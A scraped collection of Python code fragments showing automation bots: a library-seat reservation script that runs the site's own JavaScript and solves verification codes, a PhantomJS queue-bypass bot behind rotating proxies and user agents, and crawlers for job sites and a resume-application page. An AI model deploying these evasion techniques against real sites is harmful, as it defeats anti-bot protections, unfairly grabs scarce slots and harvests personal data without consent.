            # hexch_js_url = [e for e in soup.find_all('script') if
            #        str(e).find('https://static.wechat.v2.traceint.com/template/theme2/cache/layout') >= 0][0]['src']
            debug_p(func_name, 'REG_HEXCODE_URL=', self.a_task.REG_HEXCODE_URL)
            hexch_js_url = soup.find('script', src=re.compile(
                                            self.a_task.REG_HEXCODE_URL)).get('src', '')
            debug_p(func_name, 'hexch_js_url=', hexch_js_url, 'ts=', time.time()-exec_ts+0.1)

            hexch_js_code = requests.get(hexch_js_url, verify=False)
            hexch_js_code.encoding = 'utf8'
            hexch_js_code = hexch_js_code.text

            # insert 'return ...' into hexch_js_code
            # pattern = re.compile(r'(?<=[A-Z]\.ajax_get\().*?(?=,)')
            pattern = re.compile(r'(?<=T\.ajax_get\().*?(?=,)')
            ajax_url = pattern.search(hexch_js_code).group(0).replace('AJAX_URL', reserve_url_prefix)
            debug_p(func_name, 'ajax_url=', ajax_url, 'ts=', time.time()-exec_ts+0.1)
            # hexch_js_code = re.sub(r'[A-Z]\.ajax_get', 'return %s ; T.ajax_get' % ajax_url, hexch_js_code)
            hexch_js_code = re.sub(r'T\.ajax_get', 'return %s ; T.ajax_get' % ajax_url, hexch_js_code)


            #  candidate_seat_crdnt = [(seat_num, coordinate), (), ...]
            for seat_num, cordinate in candidate_seat_crdnt:

                self.tmp_trace_dct['libid'] = libid
                self.tmp_trace_dct['clssrm'] = clssrm
                self.tmp_trace_dct['seat_num'] = seat_num
                self.tmp_trace_dct['cordinate'] = cordinate
                self.tmp_trace_dct['code'] = ''
                self.tmp_trace_dct['msg'] = '没有合适的'

                if requests_time_limit <= 0:
                    break
                ### test
                time.sleep(3)

                # exe hexch_js_code
                tmp = execjs.compile(hexch_js_code)
                http_hexch_seatinfo = tmp.call('reserve_seat', libid, cordinate)
                debug_p(func_name, 'http_hexch_seatinfo=', http_hexch_seatinfo, 'ts=', time.time()-exec_ts+0.1)
                # debug_p(func_name, 'cookies=', self.a_task.M_COOKIES)

                # if need verify code , try times = 1
                try_times_limit = 1
                # check if need  verify code
                vc_code = ''
                while True:
                    time.sleep(3)
                    # reserve a seat
                    requests_time_limit -= 1

                    # exec_time
                    t = time.time() + 0.1  # '1564905302.6147149'
                    millisecond = str(str(t).split('.')[-1])[:3]
                    exe_time = str(time.strftime("%Y.%m.%d_%H:%M:%S", time.localtime(t))) + '.' + millisecond
                    debug_p(func_name, 'request, tmp_trace_dct=', self.tmp_trace_dct)

                    # response = requests.get(http_hexch_seatinfo, proxies=utils.get_proxy(), headers=self.a_task.M_HEADERS, cookies=self.a_task.M_COOKIES, verify=False)
                    response = self.sess.get(http_hexch_seatinfo + vc_code, proxies=utils.get_proxy(),
                                             headers=self.a_task.M_HEADERS, cookies=self.a_task.M_COOKIES,
                                             verify=False)
                    # response.encoding = 'utf8'
                    debug_p(func_name, 'reserve response=', response.text[:300])
                    # type(code) = int
                    code, msg = self.parse_response(response=response)
                    self.tmp_trace_dct['code'] = code
                    self.tmp_trace_dct['msg'] = msg

                    if code != 1000:
                        # self.trace_dct_ls += [{'libid': libid, 'clssrm': clssrm, 'seat_num': seat_num, 'cordinate': cordinate,
                        #                         'exe_time': exe_time, 'code': code, 'msg': msg}]
                        break

                    elif code == 1000 and try_times_limit > 0:
                        try_times_limit -= 1
                        # need vc code
                        vc_code = self.get_verifycode(imageUrl=self.a_task.CURRENT_URL['verifycode_page'])
                        # self.feedback += '验证码为:' + str(vc_code) + '' + '\n'
                        # self.trace_dct_ls[-1]['msg'] += '验证码为:' + str(vc_code) + '' + '\n'
                        # msg += '验证码为:' + str(vc_code) + '' + '\n'
                    else:
                        #
                        break

                # success  or   fialed but completed
                completed_flag = self.check_msg(self.tmp_trace_dct.get('msg', '没有合适的'))

                self.tmp_trace_dct['completed_flag'] = completed_flag

                # deep copy
                self.trace_dct_ls += [dict(self.tmp_trace_dct.items())]
                # refresh
                self.tmp_trace_dct = {}

                # self.trace_dct_ls[-1]['completed_flag'] = int(completed_flag)
                if code == 0 or completed_flag:
                    # completed, task done, discard second candidate seat
                    return True
        # normal done, failed reserve a seat, completed_flag = 'continue'
        # failed and try reserve next candidate seat,
        # if 'seat_num' not in self.tmp_trace_dct:
        self.tmp_trace_dct['clssrm'] = self.tmp_trace_dct.get('clssrm', '没有合适的')
        self.tmp_trace_dct['seat_num'] = self.tmp_trace_dct.get('seat_num', '没有合适的')
        self.tmp_trace_dct['completed_flag'] = self.tmp_trace_dct.get('completed_flag', 'continue')
        # task continue
        return False
Exemplo n.º 28
0
def run(url):
    valid_url = check_if_valid_url(url)
    if not valid_url:
        print("=> Invalid URL, must start with http://www.\n")
    else:
        print("=> URL is valid\n")

    drivers = []
    for session_num in range(0, len(PROXIES) if USE_PROXIES else NUM_SESSIONS):
        service_args = []
        if USE_PROXIES:
            proxy, proxy_auth = get_proxy(session_num)
            service_args = [
                '--proxy={}'.format(proxy),
                '--proxy-type=http',
                '--ignore-ssl-errors=true',
            ]

            if proxy_auth:
                service_args.append('--proxy-auth={}'.format(proxy_auth))

            logging.debug(service_args)

        user_agent = get_user_agent(session_num)
        desired_capabilities = dict(DesiredCapabilities.PHANTOMJS)
        desired_capabilities['phantomjs.page.settings.userAgent'] = user_agent
        desired_capabilities['phantomjs.page.customHeaders.User-Agent'] = user_agent
        desired_capabilities['phantomjs.page.customHeaders.customHeaders'] = \
            {'Accept': 'text/html', 'Content-type': 'text/html', 'Cache-Control': 'max-age=0'}

        driver = webdriver.PhantomJS(executable_path=PHANTOM_JS_LOCATION, service_args=service_args)
        driver.set_page_load_timeout(30)

        drivers.append(driver)

    for driver in drivers:
        load_session(driver, url)

    # Now the product pages are loaded, we are just gonna check if the hmac cookie is set on one of our session
    # If true we want to transfer the session to a Chrome browser to let you check-out
    opened_drivers = []
    while True:
        logging.info("Checking for hmac in all session cookies.. [10s interval]")
        for session_num, driver in enumerate(drivers):
            if check_if_past_queue(driver) and driver not in opened_drivers:
                opened_drivers.append(driver)

                logging.info("[HMAC] Cookie found on session {}".format(driver.session_id))

                # New thread open browser
                user_agent = get_user_agent(session_num)
                if USE_PROXIES:
                    proxy, proxy_auth = get_proxy(session_num)
                else:
                    proxy = None
                    proxy_auth = None

                threading.Thread(target=transfer_session, kwargs={
                    'driver': driver,
                    'proxy': proxy,
                    'proxy_auth': proxy_auth,
                    'user_agent': user_agent
                }).start()

        time.sleep(10)
Exemplo n.º 29
0
def main():
    logger = utils.get_logger()
    global zones
    global industrys
    proxy = utils.get_proxy()
    
    if not proxy:
        logger.info('did not get proxy, quit!!!')
        return 
    # proxy = None
    job_file = open('keys_number', 'r')
    jobtitles = job_file.readlines()
    job_file.close()
    apply_origin_task = False
    origin_task = {"city": "101010100", "zone": "%E6%9C%9D%E9%98%B3%E5%8C%BA", "money": 5, "jobtitle": "170501", "education": 205}
    for city in CITY_LIST:
        logger.info('---------------------------------------------------------')
        # time.sleep(10)
        if apply_origin_task and 'city' in origin_task:
            if city[0] != origin_task['city']:
                continue
            else:
                origin_task.pop('city')
            if not origin_task:
                apply_origin_task = False
                continue
        print apply_origin_task, origin_task, city
        process_dict = {'city': city[0], 'cityName': city[1]}
        list_result = get_list(page_now=30, is_get_zone=True, proxy=proxy, **process_dict)
        logger.info('1================'+str(list_result))
        # time.sleep(5)
        if (len(list_result['jobs'])<=14) and (not apply_origin_task):
            task_file = open('task_file', 'a')
            task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
            task_file.close()
            continue
        for zone in list_result['zone']:
            if apply_origin_task and 'zone' in origin_task:
                if zone[0] != origin_task['zone']:
                    continue
                else:
                    origin_task.pop('zone')
                if not origin_task:
                    apply_origin_task = False
                    continue

            else:
                process_dict = {'city': city[0], 'zone': zone[0], 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                logger.info('2================'+str(list_result))
                # time.sleep(5)
                if len(list_result['jobs'])<=14:
                    task_file = open('task_file', 'a')
                    task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                    task_file.close()
                    continue
            for jobtitle in jobtitles:
                if apply_origin_task and 'jobtitle' in origin_task:
                    if jobtitle.split()[0] != origin_task['jobtitle']:
                        continue
                    else:
                        origin_task.pop('jobtitle')
                    if not origin_task:
                        apply_origin_task = False
                        continue
                else:
                    process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                    list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                    logger.info('3================'+str(list_result))
                    # time.sleep(5)
                    if len(list_result['jobs'])<=14:
                        task_file = open('task_file', 'a')
                        task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                        task_file.close()
                        continue
                for money in MONEY_LIST:
                    if apply_origin_task and 'money' in origin_task:
                        if money != origin_task['money']:
                            continue
                        else:
                            origin_task.pop('money')
                        if not origin_task:
                            apply_origin_task = False
                            continue
                    else:
                        process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                        list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                        logger.info('4================'+str(list_result))
                        # time.sleep(5)
                        if len(list_result['jobs'])<=14:
                            task_file = open('task_file', 'a')
                            task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                            task_file.close()
                            continue
                    for education in EDUCATION_LIST:
                        if apply_origin_task and 'education' in origin_task:
                            if education != origin_task['education']:
                                continue
                            else:
                                origin_task.pop('education')
                            if not origin_task:
                                apply_origin_task = False
                                continue
                        else:
                            process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'education': education, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                            list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                            logger.info('5================'+str(list_result))
                            # time.sleep(5)
                            if len(list_result['jobs'])<=14:
                                task_file = open('task_file', 'a')
                                task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                                task_file.close()
                                continue
                        for experience in EXPERIENCE_LIST:
                            if apply_origin_task and 'experience' in origin_task:
                                if experience != origin_task['experience']:
                                    continue
                                else:
                                    origin_task.pop('experience')
                                if not origin_task:
                                    apply_origin_task = False
                                    continue
                            else:
                                process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'education': education, 'experience': experience, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                                list_result = get_list(page_now=30, proxy=proxy, **process_dict)
                                logger.info('6================'+str(list_result))
                                # time.sleep(5)
                                if len(list_result['jobs'])<=14:
                                    task_file = open('task_file', 'a')
                                    task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                                    task_file.close()
                                    continue
                            for size in SIZE_LIST:
                                if apply_origin_task and 'size' in origin_task:
                                    if size != origin_task['size']:
                                        continue
                                    else:
                                        origin_task.pop('size')
                                    if not origin_task:
                                        apply_origin_task = False
                                        continue
                                else:
                                    process_dict = {'city': city[0], 'zone': zone[0], 'jobtitle': jobtitle.split()[0], 'money': money, 'education': education, 'experience': experience, 'size': size, 'cityName': city[1]+'-'+urllib.unquote(zone[0]).decode('utf8')}
                                    task_file = open('task_file', 'a')
                                    task_file.write(json.dumps(process_dict, ensure_ascii=False)+'\n')
                                    task_file.close()
Exemplo n.º 30
0
def process(task):
    logger = utils.get_logger()
    logger.info('process jd_liepin start!!!')
    result = {'code': 0}
    redis_client = get_redis_client()
    task_data_list = task.get('data', [])
    if not task_data_list or not task_data_list[0]['executeParam']:
        logger.info('did not get task_data_list!!!')
        result['code'] = 1
        return result
    # print task_data_list
    # time.sleep(50)
    task_data = json.loads(task_data_list[0]['executeParam'])
    # task_data = task_data_list[0]['executeParam']
    # if set(['cityCode', 'cityName', 'funcCode', 'funcName']) - set(task_data.keys()):
    if set(['zone']) - set(task_data.keys()):
        logger.info('not get full keys:' + str(task_data.keys()))
        result['code'] = 2
        return result
    logger.info('deal with ' + str(task_data))
    task_data['pagenum'] = int(task_data.get('pagenum', 0))
    get_next_page_tag = True
    # proxy = utils.get_proxy()['proxy']
    proxy = utils.get_proxy()
    headers = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding':
        'gzip, deflate, sdch, br',
        'Accept-Language':
        'zh-CN,zh;q=0.8',
        'Host':
        'www.liepin.com',
        #'Upgrade-Insecure-Requests':'1',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
    }
    headers = {}
    while get_next_page_tag:

        zone = task_data.get('zone', '')
        # industry = task_data.get('industry', '')
        # industry2 = task_data.get('industry2', '')
        money = task_data.get('money', '')
        compkind = task_data.get('compkind', '')
        jobkind = task_data.get('jobkind', '')
        size = task_data.get('size', '')
        jobtitle = task_data.get('jobTitles', '')
        key_word = task_data.get('key', '')

        dqs_param = str(zone) if zone else ''
        # industry_param = str(industry) if industry else ''
        # industry_2_param = str(industry2) if industry else ''
        jobTitles_param = str(jobtitle) if jobtitle else ''
        money_param = str(money) if money else ''
        compkind_param = str(compkind) if compkind else ''
        jobkind_param = str(jobkind) if jobkind else ''
        size_param = str(size) if size else ''
        key_word_param = str(key_word) if key_word else ''

        # list_url = 'https://www.liepin.com/zhaopin/?pubTime=3&fromSearchBtn=2&init=-1&industryType='+industry_param+'&industries='+industry_2_param+'&salary='+money_param+'&jobKind='+jobkind_param+'&compscale='+size_param+'&compkind='+compkind_param+'&dqs='+dqs_param+'&curPage='+str(task_data['pagenum'])

        # list_url = 'https://www.liepin.com/zhaopin/?pubTime=1&fromSearchBtn=2&init=-1&jobTitles='+jobTitles_param+'&salary='+money_param+'&jobKind=4&compscale='+size_param+'&compkind='+compkind_param+'&dqs='+dqs_param+'&curPage='+str(task_data['pagenum'])+'&key='+key_word_param
        #list_url = 'https://www.liepin.com/zhaopin/?pubTime=1&init=-1&jobTitles='+jobTitles_param+'&salary=&jobKind=&compscale=&compkind=&dqs='+dqs_param+'&searchType=1&d_pageSize=40&d_curPage='+str(task_data['pagenum'])+'&key='
        list_url = 'https://www.liepin.com/zhaopin/?pubTime=1&jobTitles=' + jobTitles_param + '&searchType=1&dqs=' + dqs_param + '&industryType=&industries=&salary=&key=&d_pageSize=40&d_curPage=' + str(
            task_data['pagenum']) + '&&init=-1'
        try:
            for x in xrange(settings.project_settings['DOWNLOAD_RETRY_TIMES']):
                logger.info('start download list:' + list_url)
                list_result = utils.download(url=list_url,
                                             proxy=proxy,
                                             headers=headers)
                if not list_result['code']:
                    if len(list_result['data']) < 1024:
                        logger.info('get ' + list_result['data'])
                    else:
                        break
                proxy = utils.get_proxy()
                time.sleep(2)
            else:
                logger.info('error when download:' + list_url)
                result['executeParam'] = json.dumps(task_data)
                return result
            # while True:
            #     logger.info('start download list:'+list_url)
            #     list_result = utils.download(url=list_url, proxy=proxy, headers=headers)
            #     if not list_result['code']:
            #         break
            #     proxy = utils.get_proxy()
            #     time.sleep(2)
            # time.sleep(300)
            if list_result['code']:
                logger.info('get error when download list:' + str(list_result))
                raise Exception
            else:
                logger.info('success when download:' + list_url)
            tree_root = etree.HTML(list_result['data'])
            # sojob_result = tree_root.xpath('//div[@class="sojob-result "]') or tree_root.xpath('//div[@class="sojob-result"]') or tree_root.xpath('//div[@class="sojob-result sojob-no-result"]')
            job_list = tree_root.xpath('//ul[@class="sojob-list"]/li')
            if not job_list:
                logger.info('did not get job_list, return!!!')
                logger.info(u'没有符合条件的职位 %s' %
                            task_data_list[0]['executeParam'])
                get_next_page_tag = False
                break
            # job_list = tree_root.xpath('//div[@class="job-box"]/div[@class="job-list"]/ul/li')
            # next_page = tree_root.xpath('''.//a[@onclick="clickLog('from=chr_list_lowpage_next');"]''')
            job_count_number = 0

            download_day = str(time.localtime().tm_mon) + '-' + str(
                time.localtime().tm_mday)

            for job_index, job in enumerate(job_list):
                if job.atrrib['class'] == 'downgrade-search':
                    if not job_count_number:
                        logger.info(u'没有符合条件的职位 %s' %
                                    task_data_list[0]['executeParam'])
                        get_next_page_tag = False
                    break
                try:
                    job_info = job.xpath(
                        './div[@class="sojob-item-main clearfix"]/div[@class="job-info"]'
                    )[0]
                    if job_info:
                        job_url = 'https://www.liepin.com' + job_info.xpath(
                            './h3/a')[0].attrib['href']
                    else:
                        continue
                    job_count_number += 1

                    # check if need download or not
                    job_key = 'liepin_jd_' + job_url.split('/')[-1].split(
                        '.')[0]
                    has_find_in_redis = False
                    try:
                        job_download_time = redis_client.get(job_key)
                        if job_download_time == download_day:
                            has_find_in_redis = True
                        else:
                            redis_client.set(job_key, download_day)
                    except Exception, e:
                        # redis_client.set(job_key, download_day)
                        logger.info('get error when use redis.')
                        pass
                    if has_find_in_redis:
                        logger.info('has find %s in redis' % job_key)
                        continue
                    else:
                        logger.info('not find %s in redis' % job_key)

                    urgent_flag = 0
                    type_flag = 2
                    if job.xpath('.//i[@class="icon icon-red-triangle"]'):
                        urgent_flag = 1
                    if job.xpath('.//i[@class="icon icon-blue-triangle"]'):
                        type_flag = 1
                    if job.xpath('.//i[@class="icon icon-orange-triangle"]'):
                        type_flag = 3
                    time.sleep(5)

                    job_content = {
                        'content': '',
                        'type': type_flag,
                        'urgentFlag': urgent_flag,
                    }

                    for x in xrange(
                            settings.project_settings['DOWNLOAD_RETRY_TIMES']):
                        logger.info('start download job:' + job_url)
                        job_result = utils.download(url=job_url,
                                                    proxy=proxy,
                                                    headers=headers)
                        if not job_result['code']:
                            if len(list_result['data']) < 1024:
                                logger.info('get ' + list_result['data'])
                            else:
                                break
                        proxy = utils.get_proxy()
                        time.sleep(2)
                    else:
                        logger.info('error when download:' + job_url)
                        continue
                        # result['executeParam'] = json.dumps(task_data)
                        # return result
                    # while True:
                    #     logger.info('start download job:'+job_url)
                    #     job_result = utils.download(url=job_url, proxy=proxy, headers=headers)
                    #     if not job_result['code']:
                    #         break
                    #     proxy = utils.get_proxy()
                    #     time.sleep(2)
                    if job_result['code']:
                        logger.info('get error when download job_url:' +
                                    job_url + str(job_result))
                        continue
                    else:
                        logger.info('success when download:' + job_url)
                    job_root = etree.HTML(job_result['data'])
                    company_urls = job_root.xpath(
                        '//div[@class="title-info"]/h3/a')
                    company_info = ''
                    if not company_urls or not company_urls[0].attrib.get(
                            'href', ''):
                        logger.info('not get company_urls')
                    else:
                        company_url = company_urls[0].attrib['href']
                        for x in xrange(
                                settings.
                                project_settings['DOWNLOAD_RETRY_TIMES']):
                            logger.info('start download company:' +
                                        company_url)
                            company_result = utils.download(url=company_url,
                                                            proxy=proxy,
                                                            headers=headers)
                            if not company_result['code']:
                                if len(list_result['data']) < 1024:
                                    logger.info('get ' + list_result['data'])
                                else:
                                    break
                            proxy = utils.get_proxy()
                            time.sleep(2)
                        else:
                            logger.info('error when download:' + company_url)
                            continue
                            # result['executeParam'] = json.dumps(task_data)
                            # return result
                        # while True:
                        #     logger.info('start download company:'+company_url)
                        #     company_result = utils.download(url=company_url, proxy=utils.get_proxy(), headers=headers)
                        #     if not company_result['code']:
                        #         break
                        #     proxy = utils.get_proxy()
                        #     time.sleep(2)
                        if company_result['code']:
                            logger.info(
                                'get error when download company_url:' +
                                company_url + str(company_result))
                        else:
                            logger.info('success when download:' + company_url)
                            company_info = company_result['data']

                    job_content['content'] = job_result['data'].encode('utf8')
                    job_str = json.dumps(job_content, ensure_ascii=False)
                    trace_uuid = str(uuid.uuid1())
                    sql = 'insert into jd_raw (source, content, createBy, trackId, createtime, pageUrl, searchConditions, pageNum, pageIndex, contactInfo) values ("' + settings.project_settings[
                        'SOURCE'] + '", %s, "python", %s, now(), %s, %s, %s, %s, %s)'
                    # task_data['cityName'] =  task_data['cityName'].decode('utf8')
                    # task_data['funcName'] =  task_data['funcName'].decode('utf8')
                    sql_value = (job_str, trace_uuid, job_url,
                                 json.dumps(task_data, ensure_ascii=False),
                                 task_data['pagenum'], job_index,
                                 company_info.encode('utf8'))
                    kafka_data = {
                        "channelType": "WEB",
                        "content": {
                            "content":
                            job_str,
                            "id":
                            '',
                            "createBy":
                            "python",
                            "createTime":
                            int(time.time() * 1000),
                            "ip":
                            proxy,
                            "jdUpdateTime":
                            '',
                            "source":
                            settings.project_settings['SOURCE'],
                            "trackId":
                            '',
                            'contactInfo':
                            company_info.encode('utf8'),
                            'searchConditions':
                            json.dumps(task_data, ensure_ascii=False),
                            'pageUrl':
                            job_url,
                        },
                        "interfaceType": "PARSE",
                        "resourceDataType": "RAW",
                        "resourceType":
                        settings.project_settings['RESOURCE_TYPE'],
                        'protocolType': 'HTTP',
                        "source": settings.project_settings['SOURCE'],
                        "trackId": '',
                    }

                    # f=open('kafka_data', 'a')
                    # f.write(json.dumps(kafka_data)+'\n')
                    # f.close()
                    # time.sleep(10)
                    utils.save_data(sql, sql_value, kafka_data)

                except Exception, e:
                    logger.info('get error when download:' + job_url +
                                str(traceback.format_exc()))
                    continue
Exemplo n.º 31
0
def parse_next_page(cookie, page_num, max_page):
    post_url = "http://rd2.zhaopin.com/rdapply/resumes/apply/search?SF_1_1_38=2,9&orderBy=CreateTime"
    params = {
        "PageList2": "",
        "DColumn_hidden": "",
        "searchKeyword": "",
        "curSubmitRecord": "1797",
        "curMaxPageNum": "90",
        "buttonAsse": "导入测评系统",
        "buttonInfo": "发通知信",
        "SF_1_1_50": "1",
        "SF_1_1_51": "-1",
        "SF_1_1_45": "",
        "SF_1_1_44": "",
        "SF_1_1_52": "0",
        "SF_1_1_49": "0",
        "IsInvited": "0",
        "position_city": "[%%POSITION_CITY%%]",
        "DColumn_hidden": "",
        "deptName": "",
        "select_unique_id": "",
        "selectedResumeList": "",
        "PageNo": "",
        "PosState": "",
        "MinRowID": "",
        "MaxRowID": "2722819791",
        "RowsCount": "123",
        "PagesCount": "5",
        "PageType": "0",
        "CurrentPageNum": page_num,
        "Position_IDs": "[%%POSITION_IDS%%]",
        "Position_ID": "[%%POSITION_ID%%]",
        "SortType": "0",
        "isCmpSum": "0",
        "SelectIndex_Opt": "0",
        "Resume_count": "0",
        "CID": "44036673",
        "forwardingEmailList": "",
        "click_search_op_type": "-1",
        " X-Requested-With": "XMLHttpRequest",
    }
    headers = {
        "Host": "rd2.zhaopin.com",
        "Accept": "*/*",
        "Origin": "http://rd2.zhaopin.com",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent":
        "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML:like Gecko) Chrome/52.0.2743.116 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://rd2.zhaopin.com/RdApply/Resumes/Apply/index",
        "Accept-Language": "zh-CN,zh;q=0.8",
        "Cookie": cookie,
    }
    session = requests.session()
    for x in xrange(3):
        proxy = utils.get_proxy()
        page = session.post(url=post_url,
                            headers=headers,
                            data=params,
                            proxies=proxy,
                            timeout=10).content
        parse_list(page, page_num, max_page, cookie)
    return False